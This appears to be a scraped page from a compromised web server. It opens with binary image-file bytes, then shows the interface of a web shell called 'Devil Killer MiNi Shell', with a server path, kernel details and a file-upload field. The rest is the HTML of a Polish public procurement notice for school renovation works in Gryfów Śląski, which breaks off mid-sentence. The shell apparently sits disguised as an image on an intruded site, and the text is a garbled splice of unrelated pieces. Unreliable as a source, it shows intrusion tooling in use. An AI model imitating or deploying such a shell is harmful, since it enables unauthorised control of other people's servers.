JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240621/0037774501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Kompleksowa modernizacja budynków Szkoły Podstawowej nr 1 w Gryfowie Śląskim w formule „zaprojektuj i wybuduj” w podziale na części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Gryfów Śląski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821635</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gryfów Śląski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-620</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gryfow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.gryfow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa modernizacja budynków Szkoły Podstawowej nr 1 w Gryfowie Śląskim w formule „zaprojektuj i wybuduj” w podziale na części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cb91eea4-2fb1-11ef-86d2-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00377745</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00061821/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Kompleksowa modernizacja budynków Szkoły Podstawowej nr 1 w Gryfowie Śląskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-cb91eea4-2fb1-11ef-86d2-4e696a6d8c25 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl. Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej (nie dotyczy to składania ofert<br/>wraz z załącznikami) na adres e-mail: m.galucha@gryfow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za<br/>pośrednictwem formularzy do komunikacji dostępnych w zakładce„Formularze”(„Formularze do komunikacji”).Za<br/>pośrednictwem„Formularzy do komunikacji”odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie zał. do przesyłanej wiadomości(przycisk„dodaj załącznik”);<br/>2)W przypadku zał.,które są zgodnie z ustawą Pzp lub rozporządzeniem Preze.Rady Minis. w sprawie wymagań dla dokumentów<br/>elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być<br/>opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.W zależności od rodzaju podpisu i jego typu(zewnętrzny,<br/>wewnętrzny)dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu(typ<br/>zewnętrzny)lub dokument z wszytym podpisem(typ wewnętrzny); 3)Możliwość korzystania w postępowaniu z„Formularzy do<br/>komunikacji”w pełnym zakresie wymaga posiadania konta„Wykonawcy”na Platformie e-Zam. oraz zalogowania się naPlatformie eZam.Do korzystania z„Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia<br/>wystarczające jest posiadanie tzw.konta uproszczonego na Platformie e-Zamówienia; 4)Wszystkie wysłane i odebrane w<br/>postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce„Komunikacja”;<br/>5)Maksymalny rozmiar plików przesyłanych za pośrednictwem„Formularzy do komunikacji” wynosi 150MB(wielkość ta dotyczy<br/>plików przesyłanych jako zał. do jednego formularza); 6)Minimalne wymagania techniczne dotyczące sprzętu używanego w celu<br/>korzystania z usług Platformy e-Zam. oraz informacje dotyczące specyfikacji połączenia określaRegulamin Platformy e-Zam.; 7)W<br/>przypadku problemów technicznych i awarii związanych z funkcjonowaniemPlatformy e-Zamówienia użytkownicy mogą skorzystać<br/>ze wsparcia technicznego dostępnego pod numerem telefonu(75)7811257 lub drogą elektroniczną poprzez formularz udostępniony<br/>na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”; 8)W szczególnie uzasadnionych przypadkach<br/>uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwemPlatformy e-Zam.,Zamawiający dopuszcza<br/>komunikację za pomocą poczty elektronicznej na adres e-mail: sekretariat@gryfow.pl(nie dotyczy składania ofert/wniosków o<br/>dopuszczenie do udziału w postępowaniu); 9)Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych<br/>będących kopią elektroniczną treści zapisanej w postaci papierowej musi być zgodny z wymaganiami określonymi w rozporządzeniu<br/>PrezesaRadyMinistrów w sprawie wymagań dla dokumentów elektronicznych; 10)Dokumenty elektroniczne, o których mowa w<br/>§2ust.1 rozporządzenia Prez.RadyMinis. w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rad Minis. w sprawieKrajowychRam<br/>Interoperacyjności, z uwzględnieniem rodzaju przekaz. danych i przekazuje się jako załączniki. W przypadku formatów, o których<br/>mowa w art.66 ust.1ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania; 11)Informacje, oświadczenia lub<br/>dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prez. Rady Minis. w sprawie wymagań dla dokumentów<br/>elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: a)w formatach danych określonych w<br/>przepisach rozporządzenia Rady Minis. w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik),lub b)jako<br/>tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej(np.w treści wiadomości<br/>e-mail lub w treści„Formularza do komunikacji”)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WT/KMBSP/5/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I. Przebudowa i remont dachu hali sportowej w Gryfowie Śląskim. W ramach zadania należy wykonać:<br/><br/>1.	Wymiana pokrycia dachowego z papy dachowej na membranę dachową EPDM. Wymiana warstwy<br/>wełny i dopasowanie spadków w warstwie izolacji;<br/>2.	Naprawa wentylatorów dachowych wraz z podstawami dachowymi - demontaż istniejących<br/>urządzeń, wymiana na nowe 4 szt., reszta urządzeń 8 szt. przeznaczone do likwidacji;<br/>3.	Montaż klamek z linkami na sali gimnastycznej w oknach uchylnych, na wysokości 1,5 m;<br/>4.	Remont i przebudowa instalacji odgromowej, wymiana mocowań;<br/>5.	Remont obróbki blacharskiej wykańczającej attyki z wykorzystaniem blachy tytanowo cynkowej;<br/>6.	Likwidacja istniejących wpustów dachowych;<br/>7.	Demontaż istniejących kanałów wentylacyjnych na dachu budynku sali gimnastycznej;<br/>8.	Wyczyszczenie ścian attyki, zastosowanie klinów z wełny mineralnej, wykonanie uszczelnienia<br/>obwodowego z blachy stalowej ocynkowanej o gr. ok. 0,7 mm, wywinięcie membrany dachowej na<br/>ścianę attyki, poprawny montaż instalacji odgromowej z uszczelnieniami;<br/>9.	Zastosowanie klinu z wełny mineralnej przy ścianie istniejącego budynku szkoły poza zakresem<br/>opracowania. Montaż okien na wyższych listwach, zwiększenie spadku dachu od budynku szkoły,<br/>wymiana okien w ilości 3 szt.;<br/>10.	Wykonanie zadaszenia części dachu z pokryciem z poliwęglanu na podkonstrukcji aluminiowej<br/>mocowanej do ścian attykowych;<br/>11.	Demontaż centrali wentylacyjnej, możliwe przeniesienie na dach nad łącznikiem w wyznaczonym<br/>miejscu na podstawie odrębnej dokumentacji projektowej;<br/>12.	Wymiana istniejących wpustów dachowych na nowe;<br/>13.	Likwidacja istniejącej drabiny - przeniesienie w wyznaczone miejsce na elewacji północnej;<br/>14.	Dostosowanie instalacji odgromowej do nowego układu dachu;<br/>15.	Zastosowanie progu na dachu o wysokości 10 cm;<br/>16.	Zastosowanie wpustów attykowych, przeprowadzenie rur w ścianie attykowej;<br/>17.	Odprowadzenie wód opadowych za pomocą rur spustowych śr. 10cm z zastosowaniem koszy<br/>zlewowych;<br/>18.	Remont belek żelbetowych, oczyszczenie, warstwa mineralna naprawcza, ocieplenie, otynkowanie;<br/>19.	Ulokowanie nowej, stalowej drabiny ze szczeblami szerokimi na 50cm, z koszem od wysokości 300cm od poziomu gruntu prowadzącej na dach budynku mocowanej na stałe do elewacji budynku;<br/>20.	Likwidacja istniejącego pomostu i drabiny;<br/>21.	Osłona elewacyjna z blachy trapezowej, kolor zbliżony do RAL 3013, mocowanie do elewacji budynku .za pomocą podkonstrukcji aluminiowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45261910-6 - Naprawa dachów</p> <p class="mb-0">45262120-8 - Wznoszenie rusztowań</p> <p class="mb-0">45262110-5 - Demontaż rusztowań</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II. Kompleksowa modernizacja budynków Szkoły Podstawowej nr 1 w Gryfowie Śląskim w formule „zaprojektuj i wybuduj”. W ramach zadania należy zaprojektować i wykonać kompleksową modernizację budynków Szkoły Podstawowej nr 1 w Gryfowie Śląskim.<br/><br/>Parametry modernizowanego budynku:<br/>1.	Powierzchnia użytkowa 1 878,83 m2;<br/>2.	Kubatura netto 8 102,38 m3;<br/>3.	Kubatura brutto 11 947,79 m3;<br/>4.	Powierzchnia zabudowy 1 109,25 m2;<br/>5.	Wysokość budynku max 11,77 m. <br/><br/>Zakres robót do zaprojektowania i wykonania:<br/>1.	izolacja termiczna przegród zewnętrznych (ściany, ściany fundamentowe i dachy);<br/>2.	remont dachów z uwzględnieniem przygotowania podłoża pod montaż paneli fotowoltaicznych (UWAGA! konstrukcja dachu jest wykonana najprawdopodobniej w formie stropodachu wentylowanego z przykryciem z płyt panwiowych, należy uwzględnić w ofercie możliwość wystąpienia konieczności przebudowy dachu z wymianą jego przekrycia lub wykonaniem nowej konstrukcji nośnej dachu);<br/>3.	montaż stolarki okiennej w pomieszczeniu gospodarczym;<br/>4.	wymiana drzwi wejściowych;<br/>5.	demontaż krat w oknach pomieszczeń parteru i montaż rolet antywłamaniowych o klasie min. RC3;<br/>6.	wymiana źródła ciepła, w zależności od wyników oceny stanu technicznego instalacji, obudowa istniejących pionów wod-kan płytami gipsowo-kartonowymi;<br/>7.	ewentualny remont instalacji c.o. i wodno-kanalizacyjnej - w zależności od wyników inwentaryzacji i oceny stanu technicznego;<br/>8.	remont i dostosowanie do obowiązujących przepisów pomieszczenia, w którym zlokalizowane jest źródło ciepła;<br/>9.	montaż paneli fotowoltaicznych na dachach budynków wraz z wszelkimi pracami budowlano-instalacyjnymi wynikające ze stanu technicznego dachów (montaż paneli PV powinien być przeprowadzony na maksymalnie możliwej powierzchni dachu szkoły i Sali gimnastycznej);<br/>10.	kompleksowy remont korytarzy i łazienek w zakresie okładzin, sufitów, podłóg, ścian oraz wymiany drzwi na korytarzu oraz instalacji występujących na korytarzu;<br/>11.	remont sali gimnastycznej i jej zaplecza w zakresie wymiany posadzki, wykończenia ścian wewnętrznych, wyposażenia oraz wykonania nowego systemu wentylacji mechanicznej, wraz z wykonaniem rampy/podjazdu dla wózków w pomieszczeniu magazynu Sali gimnastycznej;<br/>12.	montaż nowego orynnowania;<br/>13.	montaż instalacji odgromowej;<br/>14.	wymiany ogrodzenia od strony ul. Uczniowskiej oraz systemu ochrony antywłamaniowej i dozoru;<br/>15.	ewentualne nowe przyłącza wynikające ze zmiany źródła ciepła;<br/>16.	zmiana zagospodarowania terenu od strony boiska do siatkówki przy budynku z uwagi na znaczne zawilgocenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">09330000-1 - Energia słoneczna</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dotyczy części II.:<br/>c)	sytuacji ekonomicznej lub finansowej: <br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykaże, że: <br/>•	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę w wysokości minimum 1 000 000,00 PLN. <br/>d)	zdolności technicznej lub zawodowej. <br/>•	Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej 1 robotę budowlane o wartości nie mniejszej niż 2 000 000,00 zł brutto, których zakres obejmował budowę, przebudowę rozbudowę lub modernizację obiektów kubaturowych o powierzchni zabudowy minimum 800 m2 wraz z instalacjami wewnętrznymi, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>•	Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą pełniącą funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności architektonicznej lub konstrukcyjno-budowlanej bez ograniczeń; 1 osobę pełniącą funkcje kierownika robót instalacyjnych, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń; 1 osobę posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych odpowiadające wymaganiom określonym w ustawie Prawo budowlane lub odpowiadające im ważne uprawnienia, w zakresie adekwatnym do przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub przepisów nie będących prawem krajowym. <br/>•	Zamawiający uzna ww. warunek za 